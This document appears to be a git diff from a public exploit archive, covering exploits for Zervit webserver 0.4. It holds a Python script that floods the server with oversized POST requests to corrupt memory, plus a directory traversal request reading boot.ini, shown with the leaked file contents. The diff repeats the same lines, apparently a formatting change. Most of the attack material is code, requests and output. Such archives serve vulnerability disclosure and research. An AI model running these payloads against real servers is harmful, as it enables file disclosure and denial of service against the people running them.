+In the wild... + +######################################################################################## + +#Site: http://zervit.sourceforge.net/ + +#Info: Zervit is the first compact, portable HTTP/Web Server made for human beings. +It is being developed thinking in the people that will make use of it and tries to make itself intuitive. +It aims to make file sharing or displaying a web easier than the current servers do. + +#Vulnerability: + +http://[site]/../../../../../../boot.ini + +# milw0rm.com [2009-04-16] diff --git a/platforms/windows/remote/8666.txt b/platforms/windows/remote/8666.txt index ec1ea2f5d..ecef60300 100755 --- a/platforms/windows/remote/8666.txt +++ b/platforms/windows/remote/8666.txt 
@@ -1,63 +1,63 @@ -####################### Zervit webserver 0.4 Directory Traversal & Memory Corruption ######### - - -By: e.wiZz! & shinnai - -Site: shinnai.net & balcansecurity.com - - - -[Memory Corruption] -######################################################################## - -import socket - -host = "127.0.0.1" -port = 8080 - -try: - for i in range(1,10): - buff = "a" * 3330 - request = "POST " + buff + " HTTP/1.0" - connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - connection.connect((host, port)) - connection.send(request) -except: - raw_input('\n\nUnable to connect. Press "Enter" to quit...') - - - -[Directory traversal] -################################################################################# - -[Request] - -GET /../../../../../boot.ini HTTP/1.1 -User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1 -Host: localhost:80 -Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 -Accept-Language: en-US,en;q=0.9 -Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 -Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 -Connection: Keep-Alive, TE -TE: deflate, gzip, chunked, identity, trailers -################################################# - -[Response] - -HTTP/1.1 200 OK -Server: Zervit 0.4 -X-Powered-By: Carbono -Connection: close -Accept-Ranges: bytes -Content-Type: application/octet-stream -Content-Length: 355 - -[boot loader] -timeout=30 -default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS -[operating systems] -multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT -################################################## - -# milw0rm.com [2009-05-13] +####################### Zervit webserver 0.4 Directory Traversal & Memory Corruption ######### + + +By: e.wiZz! 
& shinnai + +Site: shinnai.net & balcansecurity.com + + + +[Memory Corruption] +######################################################################## + +import socket + +host = "127.0.0.1" +port = 8080 + +try: + for i in range(1,10): + buff = "a" * 3330 + request = "POST " + buff + " HTTP/1.0" + connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + connection.connect((host, port)) + connection.send(request) +except: + raw_input('\n\nUnable to connect. Press "Enter" to quit...') + + + +[Directory traversal] +################################################################################# + +[Request] + +GET /../../../../../boot.ini HTTP/1.1 +User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1 +Host: localhost:80 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: en-US,en;q=0.9 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 +Connection: Keep-Alive, TE +TE: deflate, gzip, chunked, identity, trailers +################################################# + +[Response] + +HTTP/1.1 200 OK +Server: Zervit 0.4 +X-Powered-By: Carbono +Connection: close +Accept-Ranges: bytes +Content-Type: application/octet-stream +Content-Length: 355 + +[boot loader] +timeout=30 +default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS +[operating systems] +multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT +################################################## + +# milw0rm.com [2009-05-13]